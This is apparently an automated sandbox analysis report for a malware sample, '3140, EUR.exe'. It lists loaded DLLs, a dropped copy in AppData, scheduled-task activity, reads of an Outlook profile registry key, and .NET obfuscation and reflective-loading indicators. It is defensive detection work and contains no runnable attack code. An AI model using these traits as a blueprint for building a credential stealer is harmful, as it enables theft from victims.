Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\3140, EUR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\3140, EUR.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\3140, EUR.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 3140, EUR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 3140, EUR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 3140, EUR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source:	Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source:	Binary string: OqNV.pdb\|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs	.Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.3831c20.2.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs	.Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs	.Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
Source: 0.2.3140, EUR.exe.7600000.4.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07857080 pushad ; ret	0_2_07857081
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07857082 push esp; ret	0_2_07857089
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07853E78 push eax; mov dword ptr [esp], ecx	0_2_07853E7C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_01080D92 pushfd ; iretd	9_2_01080DF9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_01080DFA pushfd ; iretd	9_2_01080DF9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B7CC push esp; iretd	9_2_0763B7CD
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B7DD push ebp; iretd	9_2_0763B7DE
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B7B5 push ebx; iretd	9_2_0763B7B7
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763766B push ebp; iretd	9_2_07637672
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07637633 push ebp; iretd	9_2_07637642
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076376AF push esi; iretd	9_2_076376B2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07637693 push esi; iretd	9_2_076376A2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076375C3 push ebx; iretd	9_2_076375D2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B5C1 push esp; iretd	9_2_0763B5C3
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076375D3 push esp; iretd	9_2_07637602
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076375B3 push ebx; iretd	9_2_076375C2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B5B0 push ebp; iretd	9_2_0763B5B1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763E1CB push esp; iretd	9_2_0763E1D6
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BC67 push esi; iretd	9_2_0763BC68
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BC78 push esp; iretd	9_2_0763BC7A
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BC55 push ebx; iretd	9_2_0763BC57
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BC3F push ebx; iretd	9_2_0763BC41
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BBE4 push esp; iretd	9_2_0763BBE6
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BBD3 push esi; iretd	9_2_0763BBD4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BA71 push esp; iretd	9_2_0763BA72
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BAA9 push esp; iretd	9_2_0763BAAB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BA98 push esi; iretd	9_2_0763BA99
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B8F0 push ebx; iretd	9_2_0763B8F2
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B8C9 push esp; iretd	9_2_0763B8CB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B8A7 push esp; iretd	9_2_0763B8A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763B8B8 push esi; iretd	9_2_0763B8B9

Source: 3140, EUR.exe	Static PE information: section name: .text entropy: 7.773152694651227
Source: lkuPOyvaWlIu.exe.0.dr	Static PE information: section name: .text entropy: 7.773152694651227

Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, r35OtXmVa9mbccyjMN.cs	High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs	High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, pnbAqGRE0nfnZVOLAq.cs	High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs	High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs	High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, clSYfYveg2noAM7P8e.cs	High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, k9RBG6DgUfX4TknVHW.cs	High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DZt0vvzJwZJilcpPKx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, okXpofgYeVULwIjxF3.cs	High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs	High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jHN6pNdJjWN1aRaPiD.cs	High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jDZx6yMTIJBBgdc5M9.cs	High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, c43BOPb17cTkFlcAFvH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, JaiguuulGFOV4gjVP9.cs	High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.cs	High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs	High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, BNDjbyKEiDpGcvSWK6.cs	High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, kBEQvpZQ0mEMjME0yK.cs	High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, cxJt6jqq06XAko1daI.cs	High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, a5HLPykg5ohEWJsiPN.cs	High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, r35OtXmVa9mbccyjMN.cs	High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs	High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, pnbAqGRE0nfnZVOLAq.cs	High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs	High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs	High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, clSYfYveg2noAM7P8e.cs	High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, k9RBG6DgUfX4TknVHW.cs	High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, DZt0vvzJwZJilcpPKx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, okXpofgYeVULwIjxF3.cs	High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs	High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jHN6pNdJjWN1aRaPiD.cs	High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, jDZx6yMTIJBBgdc5M9.cs	High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, c43BOPb17cTkFlcAFvH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, JaiguuulGFOV4gjVP9.cs	High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
